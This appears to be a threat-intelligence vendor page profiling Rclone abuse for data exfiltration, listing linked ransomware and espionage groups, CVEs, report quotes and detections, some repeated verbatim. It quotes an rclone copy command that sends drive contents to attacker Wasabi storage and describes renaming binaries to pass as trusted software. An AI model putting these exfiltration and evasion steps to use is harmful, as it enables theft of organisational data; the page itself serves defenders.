Rclone is a legitimate, open-source, cross-platform command-line utility for managing and synchronizing files between local systems and remote storage. It is not inherently malware, but is widely abused as a data-exfiltration tool by ransomware operators and espionage actors. It supports cloud services including Dropbox, Google Drive, Amazon S3, MEGA, and Wasabi, as well as SFTP destinations. Its automation, concurrent transfers, bandwidth controls, file-selection filters, and broad storage compatibility enable large-scale theft of organizational data. Its chunker overlay can split large files into smaller pieces to accommodate storage size limits.
In intrusions, attackers commonly deploy preconfigured Rclone through existing command-and-control channels and use its copy operation to transfer data from servers and network shares to attacker-controlled storage. Some operators rename the executable to impersonate trusted applications and remove binary metadata to hinder detection. Rclone has also been abused to download SharePoint and OneDrive data using compromised Microsoft 365 accounts and OAuth tokens.
Rclone abuse is associated with Akira, Qilin, Conti, Black Basta, BlackCat, Medusa operators including Storm-1175, and the Iranian espionage group MuddyWater, also known as Seedworm. Ransomware operators frequently use it before encryption to support double extortion. Its role is typically post-compromise data transfer rather than initial access, credential theft, or encryption; legitimate backup and synchronization activity can produce similar execution patterns.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2026-50751 is the kind of vulnerability that should make you audit your IKEv1 configurations before you finish reading this sentence... an unauthenticated remote attacker can manipulate the IKEv1 exchange in a way that causes the gateway to accept the session as authenticated without ever verifying a valid user password.
CVE-2023-22515 is a critical Broken Access Control vulnerability affecting certain versions of Atlassian Confluence Data Center and Server. Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day. | CISA, FBI, and MS-ISAC are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts.
14 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Rclone appeared in 57% of investigated incidents. In the detailed case study, attackers renamed its binary to "firefox.exe" and exfiltrated sensitive data to Dropbox.
Rclone appeared in 57% of investigated incidents. In the detailed case study, attackers renamed its binary to "firefox.exe" and exfiltrated sensitive data to Dropbox.
Rclone appeared in 57% of investigated incidents. In the detailed case study, attackers renamed its binary to "firefox.exe" and exfiltrated sensitive data to Dropbox.
“The group uses rclone for cloud-based exfiltration” and “rclone to MEGA, RcloneView GUI.”
Detects Rclone transfers to Wasabi, Backblaze, and Put.io, cloud storage used by MuddyWater (Seedworm) for data exfiltration in 2026 U.S. and Israeli targeting operations.
Эксфильтрация данных - через Rclone в Wasabi cloud storage: Bash: rclone copy CSIDL_DRIVE_FIXED \ backups wasabi: [ BUCKET ] :/192.168.0.x
20 distinct techniques documented for this family, organized by ATT&CK tactic.
When backend/local runs with --links, a source .rclonelink object can plant a symlink in the destination and later directory metadata is applied through that path... os.Chown, os.Chmod, os.Chtimes, and birth-time handling can bypass os.Root confinement and follow the symlink.
Rclone was renamed "crowdstrike.exe" and the Akira encryptor was named "svcagent.exe" to resemble legitimate security or service software.
Rclone is renamed to mimic Windows binaries, including svhost.exe and scvhost.exe.
A scheduled task named TPMProfiler launched qemu-system-x86_64.exe as SYSTEM against a disguised vault.db disk image; operators then worked from the hidden QEMU guest.
When backend/local runs with --links, a source .rclonelink object can plant a symlink in the destination and later directory metadata is applied through that path... os.Chown, os.Chmod, os.Chtimes, and birth-time handling can bypass os.Root confinement and follow the symlink.
The attacker employed an Rclone command early in the intrusion to exfiltrate data from a mapped network drive (z:)... [and] a specific network share.
The report describes a "Synology NAS staging" workflow and identifies the NAS at 193.228.128.2:2222 as an intermediary between victim data and the MEGA account.
In multiple incidents analyzed by CTU researchers, the attackers staged tools in the C:\PerfLogs directory.
Usage of data exfiltration with Rclone, Chisel and Plink has also been observed by researchers.
BianLian group actors used Rclone to exfiltrate data to a cloud account they control on the same service.
43 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
60 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Legitimate file-transfer software explicitly described as abused by ransomware affiliates for data exfiltration before encryption; it is not itself a malware family.
Legitimate file-synchronisation software abused for data exfiltration in the described attack. It was launched from C:\PerfLogs; the article does not identify the destination or the data transferred.
An open-source command-line file transfer utility used by attackers for data exfiltration to cloud or remote storage destinations.
Command-line file synchronization and exfiltration tool used here for data theft to cloud storage.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.